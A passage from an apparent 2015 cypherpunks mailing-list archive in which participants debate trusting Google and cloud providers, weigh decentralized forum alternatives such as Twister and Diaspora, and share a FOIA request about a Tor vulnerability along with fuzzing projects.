July 14, 2015 2:11:35 AM stef wrote: >> > On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: >> > > https://plus.google.com/communities/109624826715876091211 >> > > Encryption Rights - Protecting Our Rights to Strongly Encrypt >> > > By Lauren Weinstein >> > > http://www.vortex.com/lauren >> > >> > but wtf in the middle of the kraakens tentacles? wth do people still trust >> > google? even laura. wtf? the mind boggles. >> > >> I'm glad it's not just me! That was my reaction too but I held back from >> commenting, because I feel like I'm always bitching here about cpunks or >> anyone interested in privacy still using google for any reason. I don't >> understand it. > > +1 here. I'm an admin for a lot of groups. Those groups are run on Yahoo, Google, as well as some that are run on private mailman machines. The question keeps coming up... what is the alternative? > Well, I understand the need for more "social" (for want of better word) > communication platform than e-mail. For me, this is Twister: > http://twister.net.co/ This looks very interesting. Thank you, i will have to look into it. But, back to the question: How/where can someone run a simple (ignoring the sign-up required by Yahoo/Google/etc.), public, free (both ways, because paying would require identification) forum, allowing for anonymous posts (but not allowing it to be overrun by trolls), that has a simple searchable (and findable - as in searched by Google, Yahoo, etc.) archive? You still have to trust a privately run forum. Trust, as in, will it be censored, altered, still there after the volunteer gets tired of it, etc.? In other words, if you want a private discussion group about Privacy, then yes, keep it small and secret... somehow. But if you want a public discussion, what are the alternatives to Google/Yahoo/etc.? -- eden From sdw at lig.net Sat Jul 18 11:35:35 2015 From: sdw at lig.net (Stephen D. Williams) Date: Sat, 18 Jul 2015 11:35:35 -0700 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: <55AA9C77.2020801@lig.net> On 7/18/15 10:32 AM, Lodewijk andré de la porte wrote: > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams >: > > I feel perfectly confident that Google is going to protect their billions in income and valuation by being very careful with > avoiding abusing their data or users in any strong sense. > > > I want to say "You're new here, aren't you?", but I know you're not. Parallel construction and intelligence laundering take care > of this in case they want to abuse your data. Big Data is never very much of a privacy issue, but when they silently use that Big > Data for their (or their companies') profit, well, without competition you'll lose. And then there's straight > business-secret-stealing, which they also do, and which is very hard to ever find out about (parallel construction is also > possible here). > > So, yeah, they'll protect their billions in income and valuation. And they'll use all the intelligence the US can bring to the > table to do it. Perfectly within the realm of the possible. A lone employee may be able to abuse things, but they likely will be caught, fired, and the incident has some chance of being righted and paid off. Unlikely to actually be the case in any pervasive way. Nearly all conspiracies leak eventually. Being a commercial company, they are a huge target for a jackpot payday. TLAs have no such worry, which is why when they do illegal things and otherwise drift or charge outside the boundaries that it is so bad. A few years ago, before Congress stepped in to let them off the hook, phone companies like ATT were in a tight spot for allowing a lot of open access to customer data. I'm sure that legal departments everywhere took notice of that exposure; Congress isn't going to do that too many more times, and especially not for commercial gain. Parallel construction is a big problem, although I think that it has been exposed in some major cases lately that should soften courts for detecting and confronting it. It's possible both for prosecutors, TLAs, and companies wanting to steal proprietary trade secrets. Perhaps practical and legal techniques used to combat insider trading may start to provide some protection. It is at least possible to take countermeasures to expose parallel construction: information that provides ways of detecting eavesdropping is an obvious solution. It is certainly the case that we should consider the possible, especially since there have been a number of surprises about how far things actually did go in the past, especially the TLAs, but also sometimes with companies with really bad culture. But that red team gaming shouldn't spill over too much into our rational assessment of actual risks and reasonable countermeasures. There is a typical problem I call the Fallacy of Insisting on Zero Risk: A mother fearing their children using the bathroom at the mall alone or calling the police because someone else's child walks to the park alone while thinking nothing of horse riding or football or rodeo or smoking. Or OSHA related spending millions per death to prevent one type of injury while ignoring other much lower hanging injury risks. Gun control, vaccines, playground equipment, etc. often involve similar elements. When making actual concrete security choices, a rational actor considers the threat, opportunity, costs, rewards, exposure, overhead, etc. when weighing what measures are worth taking. In a presentation to the Nevada Gaming Commission years ago, I used the analogy of protecting nuclear weapons: The cost of a compromise is nearly infinite, so the amount you would be willing to rationally invest to prevent a compromise also can be nearly infinite. (But apparently not given recent events related to those crews.) Everything else falls in a lower tier where there is a cost / benefit tradeoff. You can go far enough in taking measures that you are worse off than if you had been compromised in the worst probable way. The question there was how much certainty was needed that an Internet gambler was of age. We went through a similar thing related to porn: Early on, many jurisdictions insisted on absolute certainty that a remote viewer was of age, or a company-ending lawsuit or criminal case would result. Now, porn is essentially wide open, with at most proof of control of a credit card required to verify age; easily bypassed by a determined teenager, who could legally have a Visa debit card anyway. For one thing, most of the supposed damage (Meese report etc.) was bogus, so few controls are really called for. Now, many of us here want to be able to protect ourselves and others out of principle, need, career, and/or interest. We may find it fun and career worthy to have TLA / scammer / evil genius defeating countermeasures and tradecraft. We may get to the point we actually need it, or work with clients who definitely do. But we shouldn't slip into unnecessary paranoia, especially if it gets to the point of shooting ourselves in the foot. When we're making an argument, we are often taking the paranoid view because that's required to get into the right mindset. After determining how to prevent issues, we should then decide what is actually worth putting into place. I've run my own physical Internet server, including my own DNS servers, since 1992 when I obtained my first domain name and started a couple ISPs. For various reasons, I will continue to do that, but I'm not sure I'd recommend it to others, especially the non-technical. My uptime, currently at 267 days, is basically the lifetime of the hard drive or the rare case when the colo moves things around. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7072 bytes Desc: not available URL: From hozer at hozed.org Sat Jul 18 10:22:57 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sat, 18 Jul 2015 12:22:57 -0500 Subject: [Cryptography] Super-computer project wanted In-Reply-To: <55A6E2E2.7030101@gna.org> References: <55A53867.4090100@sonic.net> <55A59E56.5020206@gna.org> <55A6E2E2.7030101@gna.org> Message-ID: <20150718172257.GH27932@nl.grid.coop> On Thu, Jul 16, 2015 at 10:46:58AM +1200, Christian Gagneraud wrote: > On 15/07/15 11:42, Christian Gagneraud wrote: > >On 15/07/15 08:44, grarpamp wrote: > >>>>>dave at horsfall.org > >>>>>So, is there anything that could benefit from a few parallel > >>teraflops here and there? > >> > >>On Tue, Jul 14, 2015 at 12:27 PM, Ray Dillinger wrote: > >>>Or you could apply static code analysis software to huge > >>>masses of existing operating system, device driver, plugin, > >>>email-client or god-help-us browser code in wide use and > >>>see if you can't spot instances of dangerous vulnerabilities > >>>like buffer overflows. A list of known errors would be > >>>very helpful in getting code up to 'bulletproof' reliability > >>>and no one runs ALL the possible static analysis we know > >>>about on large bodies of code because it takes too long on > >>>regular computers. > >> > >>This, and fuzzing... of all the opensource OS's and all the > >>ported packages they supply. And dump all of github in it > >>for fun. > > > >FYI, the AFL fuzzer already have an impressing trophy case: > >See "The bug-o-rama trophy case" at http://lcamtuf.coredump.cx/afl/ > > And here is a blog post about the future of the Linux Trinity > fuzzer, used by Hacking Team to fuzz Android IOCTL. > > "I’m done enabling assholes." > > http://codemonkey.org.uk/2015/07/12/future-trinity/ > > > Chris > > > > >>It takes too long, too much developer time, a different > >>skillset, opensource test suites may not yet cover some > >>areas that commercial ones do, etc. > >> > >>Ripe for development of an open perpetual audit project. > >> > >>That, and printing your own open and trusted chips, in your own > >>open and trusted fab, are possible now. It's big picture, grand slam, > >>full circle headiness, but it is doable. People just have to get > >>together and kick it off. > >> I think the only way this is going to work is if there is a business model based on small, medium, and large scale business ecosystems selling open source hardware [1][2], and these businesses differentiate themselves by the amount and types of fuzzing they do on the whole damn system. [1] http://search.proquest.com/openview/317778ee503bb0624c7b51c868833bd0/1?pq-origsite=gscholar [2] http://gplspace.org/ From fw at deneb.enyo.de Sat Jul 18 04:39:45 2015 From: fw at deneb.enyo.de (Florian Weimer) Date: Sat, 18 Jul 2015 13:39:45 +0200 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> (dan@geer.org's message of "Tue, 14 Jul 2015 11:52:03 -0400") References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <871tg5puda.fsf@mid.deneb.enyo.de> > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." Well, for one thing, it removes physical access to machines from insiders on your end, and in many cases, also direct access to data, particularly in its bulk form. With conscious effort and the right resources, you might be able to come with better security controls than the large service providers, but right now, most organizations don't have much of an audit trail for locally run services. I'm not sure if moving data off premises actually results in a net loss of control over it. Note be cause the service providers are so good at security, but because various factors conspire to make almost everyone else so bad. From juan.g71 at gmail.com Sat Jul 18 13:46:53 2015 From: juan.g71 at gmail.com (Juan) Date: Sat, 18 Jul 2015 17:46:53 -0300 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: <55aabafb.0ae88c0a.425f.ffffdf77@mx.google.com> On Sun, 19 Jul 2015 02:32:53 +0900 Lodewijk andré de la porte wrote: > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > > > I feel perfectly confident that Google is going to protect their > > billions in income and valuation by being very careful with > > avoiding abusing their data or users in any strong sense. > > > I want to say "You're new here, aren't you?", but I know you're not. He isn't? Well, I guess then he's just yet another old and loyal apologist of the americunt establishment. Oh, yes google-NSA will 'protect' its 'customers' because of 'economic' reasons. Not to mention they are GOOD people because they say so. Hey, it's in their propaganda kits. And Yes, pseudo 'economics' talk can be widely misused to promote any kind of fascist agenda. > Parallel construction and intelligence laundering take care of this > in case they want to abuse your data. Big Data is never very much of > a privacy issue, but when they silently use that Big Data for their > (or their companies') profit, well, without competition you'll lose. > And then there's straight business-secret-stealing, which they also > do, and which is very hard to ever find out about (parallel > construction is also possible here). > > So, yeah, they'll protect their billions in income and valuation. > And > they'll use all the intelligence the US can bring to the table to do > it. From guninski at guninski.com Sat Jul 18 08:15:51 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 18 Jul 2015 18:15:51 +0300 Subject: an ominous comment In-Reply-To: <871tg5puda.fsf@mid.deneb.enyo.de> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> Message-ID: <20150718151551.GA2439@sivokote.iziade.m$> On Sat, Jul 18, 2015 at 01:39:45PM +0200, Florian Weimer wrote: > Well, for one thing, it removes physical access to machines from > insiders on your end, and in many cases, also direct access to data, > particularly in its bulk form. > > With conscious effort and the right resources, you might be able to > come with better security controls than the large service providers, > but right now, most organizations don't have much of an audit trail > for locally run services. I'm not sure if moving data off premises > actually results in a net loss of control over it. Note be cause the > service providers are so good at security, but because various factors > conspire to make almost everyone else so bad. Well, I don't trust the cloud and don't use it. (I don't trust my boxen in a different way). The cloud owns the CPU and this is enough for me. You should be aware of the numerous virtualization sploits -- Xen, Qemu, possibly others. Exploiting a virtualization bug is just the fee "to be in cloud" and I _suspect_ more efforts are needed for my boxen. From rysiek at hackerspace.pl Sat Jul 18 09:57:00 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 18:57 +0200 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <20150716175450.2ECC6680133@frontend2.nyi.internal> Message-ID: <3509647.IbPOph2uvz@lapuntu> Dnia piątek, 17 lipca 2015 00:59:19 Zenaan Harkness pisze: > On 7/16/15, Shelley wrote: > > On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote: > >> On 7/16/15 7:51 AM, Georgi Guninski wrote: > >> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote: > >> >> In a lot of ways, this is an elegant solution and could arguably be > >> >> much more secure than desktop apps in Windows. Assuming your > >> > > >> > Lol, is this positive or negative argument? > >> > > >> > it can hardly be less secure than windoze imho. > >> > >> Cypherpunks + Windows, what do you think? > >> > >> sdw > > > > It's making me break out in hives, stop it! :p > > > > *shudder* > > Windows gives you wiiiings. inb4 Wingdows -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From cathalgarvey at cathalgarvey.me Sat Jul 18 11:05:21 2015 From: cathalgarvey at cathalgarvey.me (Cathal (Phone)) Date: Sat, 18 Jul 2015 19:05:21 +0100 Subject: Encryption Rights - A Google+ community In-Reply-To: <179659091.PKgjI4HLZx@lapuntu> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> Message-ID: <3491C94B-9D92-49B0-B2CF-CB6A92F34647@cathalgarvey.me> Is Twister usable yet? Back when it released in alpha/beta form it was very slow and irregular in updating people's feeds because it was built on libtorrent which scheduled only 10 swarms at any time. The lack of a useful way to pubsub at the network level seemed to limit Twister to small followerships: if I want to follow 300 people, I have to join 300 swarms, plus a blockchain! On 18 July 2015 18:07:19 GMT+01:00, rysiek wrote: >Well, I understand the need for more "social" (for want of better word) > >communication platform than e-mail. For me, this is Twister: >http://twister.net.co/ -- Sent from my Android device with K-9 Mail. Please excuse my brevity. From rysiek at hackerspace.pl Sat Jul 18 10:07:19 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 19:07:19 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: <20150714094523.637C2C00027@frontend1.nyi.internal> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: <179659091.PKgjI4HLZx@lapuntu> Dnia wtorek, 14 lipca 2015 02:45:39 Shelley pisze: > On July 14, 2015 2:11:35 AM stef wrote: > > On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: > > > https://plus.google.com/communities/109624826715876091211 > > > Encryption Rights - Protecting Our Rights to Strongly Encrypt > > > By Lauren Weinstein > > > http://www.vortex.com/lauren > > > > but wtf in the middle of the kraakens tentacles? wth do people still trust > > google? even laura. wtf? the mind boggles. > > > > -- > > I'm glad it's not just me! That was my reaction too but I held back from > commenting, because I feel like I'm always bitching here about cpunks or > anyone interested in privacy still using google for any reason. I don't > understand it. +1 here. Well, I understand the need for more "social" (for want of better word) communication platform than e-mail. For me, this is Twister: http://twister.net.co/ -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sat Jul 18 10:09:41 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 19:09:41 +0200 Subject: Executive Director Needed, Tor Project In-Reply-To: References: Message-ID: <1681245.tG9humYGFL@lapuntu> Dnia wtorek, 14 lipca 2015 22:30:51 Griffin Boyce pisze: > Zenaan Harkness wrote: > > On 7/13/15, Griffin Boyce wrote: > >> The Doctor wrote: > >>> Griffin Boyce wrote: > >>>> Whoa whoa whoa. We all know that Vermin Supreme is the community > >>>> favorite to become the next Tor E.D. Juan's got no chance. > >>> > >>> You mean that Adam Weishaupt dropped out of the running? Shame, > >>> that. > >> > >> ^ ▲ illuminati confirmed > > > > Don't know how many times ... illumiNETti. Sheesh. > > /\ > / \ > /,--.\ > /< () >\ > / `--' \ > / dank \ Bitte. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From coderman at gmail.com Sat Jul 18 19:26:33 2015 From: coderman at gmail.com (coderman) Date: Sat, 18 Jul 2015 19:26:33 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: this new request i vote most likely to take longest time to fulfill :) "Any and all records, reports, tasking, mitigations, redesigns, post-mortems, and any other responsive materials related to compromise of "Tor" and/or "Tor Browser Bundle" and/or "Tor Vidalia Bundle" leading to breach of NSANet, JWICS, SIPRNet, and also including joint activities with access to FBINet and SCION where compromise of Tor resulted in attacker attaining access to, or potentially gaining access to these networks. Note that Tor may be incorrectly capitalized as "TOR"; please do a case insensitive search. Specific date of compromise is between July 30th 2007 and Aug. 2nd 2007; date provided to aid search efforts. CVE assigned to vulnerability is CVE-2007-4174 and provided to aid search efforts. Subject announcing vulnerability is "Tor security advisory: cross-protocol http form attack" and provided to aid search efforts. Please include results spanning the Cryptologic Services Groups, the National Security Operations Center (NSOC), the Information Assurance Directorate, the Research Associate Directorate, the Signals Intelligence Directorate, the Technology Directorate, the NSA/CSS Threat Operations Center (NTOC), and the Office of the Director, including Staff. Search of Covert Network Access technologies employed by Special Intelligence (SI) programs contained within compartmented access constraints is specifically requested, including QUANTUMTHEORY and related covert programs requiring covert Internet access. Please provide processing notes for this request, even if denied in part. Thank you!" - https://www.muckrock.com/foi/united-states-of-america-10/backhack-19811/ best regards, From coderman at gmail.com Sat Jul 18 19:53:21 2015 From: coderman at gmail.com (coderman) Date: Sat, 18 Jul 2015 19:53:21 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: P.S. this just dropped and is awesome :) https://archive.org/details/COMPLETE_FBI_VAULT_FOIA_PDF_ARCHIVES_07_15_15 54GB FBI VAULT FOIA PDF ARCHIVES V1.0 SOURCE: https://vault.fbi.gov ABOUT THIS DOWNLOAD SET (4 PARTS): – four downloadable .zip files uncompress to roughly 54GB total – complete FBI Vault online archives (up to July 15 2015) – meticulous folder structure – all individual PDF files renamed accordingly & logically – utilizes long file/folder names on Mac OS X 10.10.4 – archive created on Mac OS X 10.10.4 – master folders compressed to .zip files via standard system compression utility [SPECIAL NOTE: This version of the archive is much better than the original FBI downloadable components. This took much time to methodically download, compile and cleanup.] FOLDER DIRECTORY: http://pastebin.com/0RcBHjKP From rysiek at hackerspace.pl Sat Jul 18 14:09:21 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 23:09:21 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: References: <179659091.PKgjI4HLZx@lapuntu> Message-ID: <1967648.u6W7a8k46C@lapuntu> Dnia sobota, 18 lipca 2015 10:55:52 eden pisze: > > +1 here. > > I'm an admin for a lot of groups. Those groups are run on Yahoo, > Google, as well as some that are run on private mailman machines. The > question keeps coming up... what is the alternative? Run your own servers, control your own infrastructure. There are ways to do it. Next on my "ToTest" list is this, for instance: https://github.com/sovereign/sovereign > > Well, I understand the need for more "social" (for want of better word) > > communication platform than e-mail. For me, this is Twister: > > http://twister.net.co/ > > This looks very interesting. Thank you, i will have to look into it. > > But, back to the question: How/where can someone run a simple > (ignoring the sign-up required by Yahoo/Google/etc.), public, free > (both ways, because paying would require identification) forum, > allowing for anonymous posts (but not allowing it to be overrun by > trolls), that has a simple searchable (and findable - as in searched > by Google, Yahoo, etc.) archive? The question is not price; the question is whether you are aware that you're always paying in hard cash or private data. If you value your data you will find the cash. > You still have to trust a privately run forum. Trust, as in, will > it be censored, altered, still there after the volunteer gets tired of > it, etc.? Run your own forum, or use something like Twister -- censorship doesn't really seem possible there. > In other words, if you want a private discussion group about > Privacy, then yes, keep it small and secret... somehow. But if you > want a public discussion, what are the alternatives to > Google/Yahoo/etc.? Get more people off of Google/Yahoo/etc. There's also The Federation: http://the-federation.info/ You can even set up more pods/servers. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sat Jul 18 14:16:35 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 23:16:35 +0200 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: <7049550.bpsJSTxgSn@lapuntu> Dnia niedziela, 19 lipca 2015 02:36:56 Lodewijk andré de la porte pisze: > 2015-07-08 16:52 GMT+09:00 Juan : > > Damn! You grarpamp and your pals who 'own'the government, > > should have told your servants not to do that. What happened?? > > They wanted their servants to keep them safe :) This is actually a very good comment on democracy. "If you want to stay safe, don't rely on your servants to keep you safe." -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From zen at freedbms.net Sat Jul 18 17:42:47 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 19 Jul 2015 00:42:47 +0000 Subject: an ominous comment In-Reply-To: <55AA8B5E.1040202@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: On 7/18/15, Stephen D. Williams wrote: > I feel perfectly confident that Google is going to > protect their billions in income and valuation by being very > careful with avoiding abusing their data or users in any strong sense. Wellp, see here now sonny ... a little bit of gennel abuse now, that's ok now ya here me son? Just a little slap if she says no 'll bring her right into line, and short or long of that, these here 4 gennel silky cuffs - tie em reel gennel like, and them users aint ever gonna notice. Once they's hog tied in a nice soft and golden cage of online service, they don't know what data been inserted and sold no where. ... You listenin ta me son?!! . Stop picken your nose! From zen at freedbms.net Sat Jul 18 17:58:23 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 19 Jul 2015 00:58:23 +0000 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: On 7/18/15, Lodewijk andré de la porte wrote: > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > >> I feel perfectly confident that Google is going to protect their billions >> in income and valuation by being very careful with avoiding abusing their >> data or users in any strong sense. > > > I want to say "You're new here, aren't you?", but I know you're not. > Parallel construction and intelligence laundering take care of this in case > they want to abuse your data. Big Data is never very much of a privacy > issue, but when they silently use that Big Data for their (or their > companies') profit, well, without competition you'll lose. And then there's > straight business-secret-stealing, which they also do, and which is very > hard to ever find out about (parallel construction is also possible here). > > So, yeah, they'll protect their billions in income and valuation. > And they'll use all the intelligence the US can bring Oh how I wish that were true. > to the table to do it. Timeless as ever - Party in the CIA (Wierd al Yankovic): https://www.youtube.com/watch?v=C-CG5w4YwOI From odinn.cyberguerrilla at riseup.net Sun Jul 19 01:00:48 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Sun, 19 Jul 2015 01:00:48 -0700 Subject: Encryption Rights - A Google+ community In-Reply-To: <3491C94B-9D92-49B0-B2CF-CB6A92F34647@cathalgarvey.me> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> <3491C94B-9D92-49B0-B2CF-CB6A92F34647@cathalgarvey.me> Message-ID: <55AB5930.70500@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Those who are following this list probably know these options already, but it bears repeating in case a reader has not yet checked one of these out: Diaspora (http://podupti.me), Twister (http://twister.net.co/), TrsstProject (https://github.com/TrsstProject/trsst/releases) And of course, don't forget bitmessage (or pybitmessage available on linux) https://bitmessage.org/wiki/Main_Page On 07/18/2015 11:05 AM, Cathal (Phone) wrote: > Is Twister usable yet? Back when it released in alpha/beta form it > was very slow and irregular in updating people's feeds because it > was built on libtorrent which scheduled only 10 swarms at any > time. > > The lack of a useful way to pubsub at the network level seemed to > limit Twister to small followerships: if I want to follow 300 > people, I have to join 300 swarms, plus a blockchain! > > On 18 July 2015 18:07:19 GMT+01:00, rysiek > wrote: >> Well, I understand the need for more "social" (for want of better >> word) >> >> communication platform than e-mail. For me, this is Twister: >> http://twister.net.co/ > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVq1kwAAoJEGxwq/inSG8CSHsIAJK5+7K0g6/9mtorBG7sdOef 0ns9eWM6BrwTQ2aVHqRRWcVpXsinba950q0gWxsInzt0l7DOun78YJKqlQB1nsT0 aPh8CIKAMgyIxLc3xKdlJhc7fWH5fGCHSd3dKcgNWBpdOugylgwKD8ZF8552QABH TefMoKQnejlExNsoBch5GORVZ9+JoI7EakMV4Xh/2wwgLtuFgsUHj4Q9QlhaQlKf eD9T/SPC9fgDj4FP8xdaiEstZKrGnUhovC6ha3/cklCHJqDaZJwHMnyQfgnJuHTZ FSWqMtmyC/rF5CRIdsfThFA8GZFzUtC6ZpoWL1V2ztyxId4eOdXZMJ92q2uUaoY= =MM5M -----END PGP SIGNATURE----- From l at odewijk.nl Sat Jul 18 10:32:53 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sun, 19 Jul 2015 02:32:53 +0900 Subject: an ominous comment In-Reply-To: <55AA8B5E.1040202@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > I feel perfectly confident that Google is going to protect their billions > in income and valuation by being very careful with avoiding abusing their > data or users in any strong sense. I want to say "You're new here, aren't you?", but I know you're not. Parallel construction and intelligence laundering take care of this in case they want to abuse your data. Big Data is never very much of a privacy issue, but when they silently use that Big Data for their (or their companies') profit, well, without competition you'll lose. And then there's straight business-secret-stealing, which they also do, and which is very hard to ever find out about (parallel construction is also possible here). So, yeah, they'll protect their billions in income and valuation. And they'll use all the intelligence the US can bring to the table to do it. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1297 bytes Desc: not available URL: From l at odewijk.nl Sat Jul 18 10:36:56 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sun, 19 Jul 2015 02:36:56 +0900 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: <559cd699.c511370a.4f2c6.2444@mx.google.com> References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: 2015-07-08 16:52 GMT+09:00 Juan : > Damn! You grarpamp and your pals who 'own'the government, > should have told your servants not to do that. What happened?? > They wanted their servants to keep them safe :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 605 bytes Desc: not available URL: From zen at freedbms.net Sat Jul 18 19:44:57 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 19 Jul 2015 02:44:57 +0000 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: <559cd699.c511370a.4f2c6.2444@mx.google.com> References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: On 7/8/15, Juan wrote: > On Wed, 8 Jul 2015 03:40:47 -0400 > grarpamp wrote: >> The Senate Intelligence Committee secretly voted on June 24 in favor >> of legislation requiring e-mail providers and social media sites to >> report suspected terrorist activities. The legislation, approved 15-0 >> in a closed-door hearing, remains "classified." The relevant text is >> contained in the 2016 intelligence authorization... > > Damn! You grarpamp and your pals who 'own'the government, > should have told your servants not to do that. What happened?? The legislation will not be television. Shjte, it won't even be published - it's so classified, not even the president is allowed to read it. First they came for the govmint, and I said nothing. Next they came for the currency, and I said nothing. Then they came for our freedoms, one by one, and each time I said nothing. At hurricane Katrina they roamed the suburbs and demanded the guns, and every house handed over at least one gun, rather loudly proclaiming "you can take my gun from my warm and very much alive fingers since I never had a real spine anyway". Then they came for me... Paraphrasing 'Atlas Shrugged'. From fw at deneb.enyo.de Sun Jul 19 01:15:38 2015 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 19 Jul 2015 10:15:38 +0200 Subject: an ominous comment In-Reply-To: <20150718151551.GA2439@sivokote.iziade.m$> (Georgi Guninski's message of "Sat, 18 Jul 2015 18:15:51 +0300") References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> Message-ID: <877fpwmul1.fsf@mid.deneb.enyo.de> * Georgi Guninski: > You should be aware of the numerous virtualization > sploits -- Xen, Qemu, possibly others. > > Exploiting a virtualization bug is just the fee > "to be in cloud" and I _suspect_ more efforts > are needed for my boxen. Not all service providers hand you the capability to run arbitrary code to run VM exploits, so you have to exploit an application bug first. (And the application may even run on bare metal.) Service providers can also provision VMs in such a way that customers can only attack themselves. From fw at deneb.enyo.de Sun Jul 19 02:20:43 2015 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 19 Jul 2015 11:20:43 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: (eden's message of "Sat, 18 Jul 2015 10:55:52 -0700") References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> Message-ID: <874ml0jyfo.fsf@mid.deneb.enyo.de> * eden: > I'm an admin for a lot of groups. Those groups are run on Yahoo, > Google, as well as some that are run on private mailman machines. The > question keeps coming up... what is the alternative? Mailman 3? It is supposed to offer an interface which appeals more to casual users not entirely comfortable with email, while at the same time offering complete email integration. I've also seen Discourse instances which look quite useful, but I'm not a regular user on such platforms to tell how it works out in practice. From rysiek at hackerspace.pl 